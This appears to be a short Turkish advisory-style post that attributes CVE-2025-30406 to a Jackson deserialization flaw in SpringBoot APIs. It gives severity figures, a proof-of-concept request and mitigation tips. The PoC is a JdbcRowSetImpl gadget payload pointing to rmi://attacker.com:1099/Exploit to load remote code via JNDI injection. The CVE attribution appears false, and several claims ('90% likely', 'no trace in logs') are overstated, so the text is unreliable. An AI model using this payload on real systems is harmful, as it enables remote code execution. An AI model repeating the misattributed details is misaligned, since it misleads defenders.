Sızma Testçisi Gözüyle Özet
CVE-2025-30406, SpringBoot tabanlı REST API'lerde, **güvenilmeyen JSON serileştirme** yüzünden oluşan, istismar edilmesi çok kolay ve tespiti zor bir güvenlik açığıdır. Exploit ile, saldırgan sisteme arbitary kod yükleyebilir ve komut çalıştırabilir. Modern SOC’lar bile bu saldırıyı atlayabiliyor çünkü exploitler, uygulamanın normal iş akışı gibi gözüküyor!
Teknik Detaylar
- Açık Nokta: Deserialization of Untrusted Data (CWE-502)
- Etkilenenler: SpringBoot 2.7.x & 3.x (özellikle özelleştirilmiş Jackson/JSON parser kullanılan servisler)
- CVSS: 9.1 / 10 (Critical)
- Uzman Yorumu: Eğer API endpointlerinden biri karmaşık nesne/DTO alıyorsa, bu açık neredeyse %90 ihtimalle vardır!
Proof of Concept (PoC)
POST /api/user HTTP/1.1
Host: hedefsite.com
Content-Type: application/json
{
"@class": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "rmi://attacker.com:1099/Exploit",
"autoCommit": true
}
Not: Java RMI üzerinden JNDI Injection tetiklenerek sistem ele geçirilebilir.
Uzman Analizi
Saldırının en tehlikeli yönü, backend loglarında genellikle hiçbir iz bırakmamasıdır.
Birçok pentest senaryosunda, “güvenli sanılan” internal API’lar bu açık yüzünden ele geçirildi.
Tavsiye: Tüm serileştirme işlemlerinde whitelisting ve type kontrolü kullanın!
Çözüm / Mitigation
- Jackson veya benzeri parser'larda Polymorphic Type Handling'i devre dışı bırakın.
- Yalnızca güvenli sınıflara (DTO) izin verin, dışarıdan @class parametresinin gelmesini engelleyin.
- Input validation ve API Gateway WAF ile ekstra koruma sağlayın.
- Sunucu outbound bağlantılarını minimuma indirin (RMI, LDAP trafiği engellenmeli).